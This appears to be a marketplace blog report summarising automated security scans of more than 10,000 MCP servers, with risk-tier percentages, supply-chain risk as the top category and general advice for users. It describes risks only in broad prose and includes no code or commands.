Key takeaways
- We scanned more than 10,000 MCP servers. About 1 in 4 scores above low risk, and nearly 1 in 3 has a serious supply-chain issue.
- Supply-chain risk is the single biggest problem, far ahead of any other category. The danger is usually what a server pulls in, not its own code.
- Most servers are safe and easy to find: about three quarters scan clean. Check the security score before installing.
Short answer: most MCP servers are reasonably safe, but a meaningful minority are not. MCP servers are the plug-in tools that extend AI assistants like Claude and ChatGPT. Across more than 10,000 of them we scanned, about 1 in 4 scores above low risk, roughly 1 in 8 carries at least one critical-severity finding, and nearly 1 in 3 has a serious supply-chain issue. The average server scores 8.0 out of 10, where higher is safer. The risk is real but concentrated, which means the useful question is not "are MCP servers safe" in general, it is "is this specific server safe," and that is answerable.
This is the first public dataset we know of at this scale. Every server listed on MCP Marketplace is automatically security-scanned before it goes live, so we sit on security results for the broad MCP ecosystem rather than a handful of hand-picked examples. Here is what that data says.
How many MCP servers are actually safe?
Here is the full risk breakdown across every scanned server, as of June 2026.
| Risk level | Share of servers | What it means |
|---|---|---|
| Low | 74.9% | Clean scan, no serious findings |
| Moderate | 11.5% | Minor issues worth a look before installing |
| High | 11.2% | Serious findings, install with caution |
| Critical | 2.5% | Severe findings, review carefully before use |
The headline is the 25% on the other side of "low." One in four MCP servers is not a clean install. About 13.7% land in the high or critical risk tier overall. A wider 11.9% (roughly 1 in 8) carry at least one critical-severity finding even when their other checks pull the overall score higher, so the share of servers with a serious individual problem is larger than the 2.5% critical tier alone suggests.
That matters more for MCP than for a typical package, because an MCP server is not a passive dependency. Once connected, it runs with access to the tools, files, and data your AI assistant can reach. A risky MCP server is closer to handing someone a key than to importing a library.
What is the single biggest risk in MCP servers?
Supply-chain risk, and it is not close. Nearly 1 in 3 scanned servers (31.8%) has a high or critical supply-chain finding, far ahead of every other category we track.
Ranked by how often each category produces serious findings:
| Risk category | Relative prevalence | Plain-English version |
|---|---|---|
| Supply chain | Highest by a wide margin | Untrusted or unverifiable code and dependencies in the install path |
| Package verification | Common | Published package does not cleanly match its stated source |
| Code vulnerabilities | Moderate | Exploitable patterns in the server's own code |
| Remote trust | Moderate | Hosted servers whose endpoint or operator is hard to verify |
| Remote protocol | Lower | Transport or protocol handling that does not follow the spec |
The takeaway for anyone installing MCP servers: the danger is usually not a dramatic exploit in the server's own code. It is what the server pulls in and runs on your machine, and whether the thing you are installing is really the thing the author published. Those are exactly the questions a casual look at a GitHub repo will not answer.
What does a "critical" MCP server look like?
The critical-risk servers in our data tend to share a profile rather than a single smoking gun: unverifiable packages, dependencies from untrusted sources, and install steps that quietly fetch and execute remote code. Many look completely normal at install time. Source code can read as routine while the actual risk sits one layer down in what gets pulled in, or in an update that lands after you have already approved the tool.
That delay is the hard part. A server can be clean the day you install it and change later, which is why a point-in-time glance is weak protection and why we re-scan continuously rather than once at submission.
How we scanned them
Every server submitted to or imported into MCP Marketplace runs through an automated security scan before it is listed, and gets re-scanned over time. The scan evaluates several independent risk categories, including the supply-chain, package-verification, code-vulnerability, and remote-trust dimensions above, and produces a single 0 to 10 security score plus a categorized list of findings.
The numbers in this report cover more than 10,000 scanned servers across the live catalog as of June 2026, drawn from the official MCP Registry and direct creator submissions rather than a hand-picked set. They describe the public MCP ecosystem roughly as it actually ships. We are publishing the aggregate results, not the detection internals, so the picture is honest without handing a playbook to anyone trying to slip past a scan.
What this means if you use MCP servers
Three practical conclusions fall out of the data.
- Do not assume safety from popularity or a clean-looking repo. A third of servers have a serious supply-chain issue that a quick read will miss, and the riskiest ones often look fine on the surface.
- Treat installing an MCP server like granting access, not adding a library. It runs where your AI assistant runs. The bar should be higher.
- Lean on a security score and re-scanning instead of a one-time check. The real exposure often shows up in dependencies and in later updates, not in the code you skim on day one.
The good news is that the safe majority is large and easy to find. About three quarters of servers scan clean, you can filter directly to them, and because we re-scan continuously, those scores stay current rather than freezing at install time.
Browse security-scanned MCP servers, sorted by security score
If you want the deeper background on the threat itself, see our explainer on whether MCP servers are safe.
Methodology: figures reflect automated security scans of the live MCP Marketplace catalog as of June 2026, covering more than 10,000 listed servers (those in approved or publicly flagged status). Risk levels and the 0 to 10 security score, where higher is safer, are produced by our automated scanner. We report aggregate results only, and percentages are rounded so they may not total exactly 100.